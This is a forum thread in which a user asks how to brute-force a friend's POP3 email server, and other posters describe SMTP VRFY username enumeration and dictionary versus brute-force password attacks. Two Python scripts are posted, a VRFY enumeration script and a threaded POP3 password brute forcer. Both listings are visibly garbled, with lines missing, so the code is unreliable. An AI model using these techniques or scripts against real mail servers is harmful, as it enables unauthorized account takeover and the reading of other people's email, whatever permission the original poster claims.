Jump to content

Brute Force pop3


Recommended Posts

I was wondering if anyone has done , or knows were to point me in the right direction. My mate has setup a email server @ his house and wants me to test it eg metaspoilt so forth , but i have never done brute force email attacks. I guess you use a dictonary attack , but how do you get a list of email accounts on that server ?


Link to comment
Share on other sites

how do you get a list of email accounts on that server ?

have a look at smtp enumeration techniques

if the server allows VRFY you can brute force the email accounts.

write a script that takes a list of names (joe,jim,jon) and then tags the domain to it (@blogs.com)

then VRFY against the server

What server is he using ?

Link to comment
Share on other sites

I think Brutus can conduct a bruteforce attack against POP3.

Correct me if I'm wrong but a bruteforce attack and a dictionary attack is two diffrent things.

Bruteforce - try every combination of a certain number of characters

Dictionary - uses wordlists to try passwords

I think there is an old python script called GooMail previously included in the BT2 suite which used some google parameters to filter out mail adresses based on a certain domain.

Good luck!

/gEEEk :)

Link to comment
Share on other sites

Correct me if I'm wrong but a bruteforce attack and a dictionary attack is two diffrent things.

You are sorta right, IMO. Both of them are throwing shit at the wall to see what sticks so either way you are trying to brute force it, only with a dictionary you have a predefined set of words. Depending on what he is running as the POP3 server it shouldnt be that hard. Admin, HISNAME, CONTACT @whatever.com. A bruteforce attack is going to do some stupid shit and get picked up fairly quickly with a decent IDS. Go with a word list, and Python.

Link to comment
Share on other sites

Yeah i tryed a python script , for dictionary attack to get usernames but i was un-successfull due to vrfy being disabled. i might try some other methods tonight

i used this


import socket

import sys

import fileinput

if len(sys.argv) !=2:

print "Usage: <inputfile>"





print banner

for line in fileinput.input():

s.send('VRFY '+line)


print result


it worked but dam server had vrfy disabled , anyone know some other methods ? , otherwise ill try some brute force

Link to comment
Share on other sites

Have you scanned the host with nmap? Are there other services running? Here is your code

#Pop3 Brute Forcer

import threading, time, random, sys, poplib
from copy import copy

if len(sys.argv) !=4:
    print "Usage: ./popbrute.py &lt;server&gt; &lt;userlist&gt; &lt;wordlist&gt;"

      users = open(sys.argv[2], "r").readlines()
      print "Error: Check your userlist path\n"
      words = open(sys.argv[3], "r").readlines()
      print "Error: Check your wordlist path\n"
    pop = poplib.POP3(sys.argv[1])
    welcome = pop.getwelcome()
except (poplib.error_proto): 
    welcome = "No Response"

print "\n\t   d3hydr8[at]gmail[dot]com popBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
print "[+] Server response:",welcome,"\n"

wordlist = copy(words)

def reloader():
    for word in wordlist:

def getword():
    lock = threading.Lock()
    if len(words) != 0:
        value = random.sample(words,  1)
        print "Reloading Wordlist - Changing User\n"
        value = random.sample(words,  1)
    return value[0][:-1], users[0][:-1]
class Worker(threading.Thread):
    def run(self):
        value, user = getword()
            print "-"*12
            print "User:",user,"Password:",value
            pop = poplib.POP3(sys.argv[1])
            print "\t\nLogin successful:",value, user
            print pop.stat()
        except (poplib.error_proto), msg: 
            #print "An error occurred:", msg

for i in range(len(words)*len(users)):
    work = Worker()

Link to comment
Share on other sites

  • 4 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...